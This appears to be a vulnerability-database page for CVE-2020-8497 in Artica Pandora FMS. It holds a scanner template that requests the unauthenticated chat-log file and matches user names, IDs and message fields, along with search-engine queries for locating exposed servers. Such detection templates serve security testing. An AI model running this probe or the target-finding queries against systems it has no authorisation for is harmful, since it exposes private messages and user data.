| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2020-8497 | 11 Apr 202621:03 | – | circl | |
| Artica Pandora FMS Information Disclosure Vulnerability (CNVD-2020-20720) | 24 Mar 202000:00 | – | cnvd | |
| CVE-2020-8497 | 23 Mar 202015:01 | – | cve | |
| CVE-2020-8497 | 23 Mar 202015:01 | – | cvelist | |
| CVE-2020-8497 | 23 Mar 202015:15 | – | nvd | |
| CVE-2020-8497 | 23 Mar 202015:15 | – | osv | |
| Design/Logic Flaw | 15 Apr 202015:15 | – | prion | |
| Format string | 23 Mar 202015:15 | – | prion | |
| CVE-2020-8497 | 22 May 202516:51 | – | redhatcve | |
| VulnCheck KEV: CVE-2020-8497 | 8 Apr 202600:00 | – | vulncheck_kev |
id: CVE-2020-8497
info:
name: Artica Pandora FMS <=7.42 - Arbitrary File Read
author: gy741
severity: medium
description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
remediation: |
Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability.
reference:
- https://k4m1ll0.com/cve-2020-8497.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-8497
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-8497
cwe-id: CWE-306
epss-score: 0.05275
epss-percentile: 0.91573
cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: artica
product: pandora_fms
shodan-query: http.title:"pandora fms"
fofa-query: title="pandora fms"
google-query: intitle:"pandora fms"
tags: cve,cve2020,fms,artica,vuln,vkev
http:
- method: GET
path:
- '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"type"'
- '"id_user"'
- '"user_name"'
- '"text"'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100caacb1274428cf97fe99971b8da6337e04d7c43e99a133005314807e353591f502204057fd223efe1db97b28efc1ea19d805c054e7af8d07358e230346773b1682df:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation